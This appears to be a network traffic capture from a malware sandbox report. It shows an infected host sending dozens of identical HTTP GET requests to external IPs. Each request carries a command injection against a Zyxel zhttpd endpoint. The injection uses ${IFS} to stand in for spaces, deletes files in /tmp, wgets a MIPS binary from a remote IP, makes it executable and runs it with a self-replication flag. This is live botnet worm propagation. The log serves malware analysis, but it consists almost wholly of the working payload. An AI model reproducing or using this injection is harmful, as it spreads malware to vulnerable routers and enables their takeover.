                                        Jan 14, 2024 16:18:56.737293005 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7501192.168.2.1343058162.118.163.54443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:56.737355947 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7502192.168.2.134589414.119.23.153443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:56.737401009 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7503192.168.2.1342080212.187.245.159443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:56.737446070 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7504192.168.2.13531405.101.165.189443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:56.737545013 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7505192.168.2.134741049.73.87.20443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:56.737612009 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7506192.168.2.1339936111.202.26.54443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:56.737684965 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7507192.168.2.1359118201.188.17.242443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:56.737739086 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7508192.168.2.1360568118.230.62.28443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:56.737801075 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7509192.168.2.134370432.177.75.25443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:56.737854004 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7510192.168.2.134362865.171.110.248443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:56.737900019 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7511192.168.2.1338192199.58.186.182443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:56.737938881 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7512192.168.2.1358694182.255.65.96443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:56.738007069 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7513192.168.2.13476502.153.105.41443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:56.738090992 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7514192.168.2.1352166145.229.68.106443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:56.738128901 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7515192.168.2.133421876.45.66.217443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:56.738198996 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7516192.168.2.1347782160.125.180.55443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:56.738229990 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7517192.168.2.1359080197.45.168.137443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:56.738295078 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7518192.168.2.1332806219.171.243.233443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:56.738348007 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7519192.168.2.1335410123.245.140.113443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:56.738396883 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7520192.168.2.135270223.81.206.186443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:56.738447905 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7521192.168.2.134665879.163.93.0443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:56.738528013 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7522192.168.2.134091031.236.192.205443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:56.738564968 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7523192.168.2.1351384197.140.189.130443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:56.738619089 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7524192.168.2.135935487.17.58.87443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:56.738688946 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7525192.168.2.1356554212.119.117.29443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:56.738733053 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7526192.168.2.1343764192.199.42.251443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:56.738784075 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7527192.168.2.1353640212.126.147.1443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:56.738830090 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7528192.168.2.1353360222.117.97.165443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:56.738892078 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7529192.168.2.1347240130.144.119.159443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:56.738962889 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7530192.168.2.135023282.193.59.88443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:56.739036083 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7531192.168.2.1338344156.133.22.59443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:56.739089966 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7532192.168.2.1357368135.176.91.42443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:56.739176035 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7533192.168.2.1336026207.166.200.23443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:56.739202976 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7534192.168.2.1343684138.29.64.194443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:56.739249945 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7535192.168.2.1350116188.56.2.50443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:56.739332914 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7536192.168.2.134355814.39.222.146443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:56.739370108 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7537192.168.2.1351856123.127.62.39443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:56.739455938 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7538192.168.2.1355270191.217.97.20443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:56.739486933 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7539192.168.2.133613470.63.121.23443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:56.739537001 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7540192.168.2.1340024165.91.54.154443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:56.739603043 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7541192.168.2.1358544199.107.137.216443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:56.739659071 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7542192.168.2.1360096194.249.227.168443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:56.739737034 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7543192.168.2.135204276.120.47.70443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:56.739825010 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7544192.168.2.134840235.77.113.28443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:56.739826918 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7545192.168.2.1348278115.138.23.50443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:56.739888906 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7546192.168.2.1332846126.120.62.173443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:56.739928961 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7547192.168.2.1333830198.159.241.23443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:56.740009069 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7548192.168.2.134969825.129.247.47443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:56.740067959 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7549192.168.2.1342106223.28.203.243443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:56.740124941 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7550192.168.2.1340558204.29.144.174443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:56.740195036 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7551192.168.2.135278454.133.19.106443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:56.740262032 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7552192.168.2.1349474139.78.161.128443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:56.740272045 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7553192.168.2.1333698159.250.114.63443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:56.740328074 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7554192.168.2.135104024.183.157.201443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:56.740369081 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7555192.168.2.1358924101.168.80.93443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:56.740444899 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7556192.168.2.1350046117.39.111.169443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:56.740468979 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7557192.168.2.135499246.141.173.171443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:56.740541935 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7558192.168.2.1335162177.56.61.5443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:56.740586042 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7559192.168.2.1352844175.147.43.113443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:56.740634918 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7560192.168.2.1338884167.71.38.245443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:56.740699053 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7561192.168.2.134934673.189.131.43443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:56.740755081 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7562192.168.2.134926238.146.128.101443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:56.740808964 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7563192.168.2.1360824114.191.249.234443
                                        TimestampBytes transferredDirectionData
